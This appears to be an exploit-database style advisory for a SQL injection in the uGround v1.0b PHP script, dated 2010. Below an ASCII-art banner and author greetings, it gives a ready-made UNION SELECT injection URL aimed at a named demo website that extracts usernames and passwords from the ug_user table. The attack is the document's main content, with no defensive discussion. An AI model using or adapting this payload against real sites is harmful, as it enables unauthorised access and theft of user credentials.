uGround versions 1.0b and below suffer from a remote SQL injection vulnerability.
4a51102f3270ddc18fe820211d591ab42e7af100f0ac7732932527b2098ceff6
# Exploit Title: uGround v1.0b SQL Injection
# Date: 17.02.2010
# Author: Easy Laster
# Tested on: windows xp
# Bug : fixed
########################################################################
##uGround v1.0b SQL Injection ##
########################################################################
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
##########################################################################
#Script: uGround v1.0b SQL Injection news.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ buy this script ] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-,silent vapor] #
#Price: [ Commercial License EUR unknown #
#DEMO : www.powerofanime.net #
#############################################################################
#http://www.powerofanime.net/index.html?download=-11111111+union+select+1, #
#concat%28u_pass,0x3a,u_user%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 #
#,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,37,38,39,40,41,42+from+ #
#ug_user# #
#############################################################################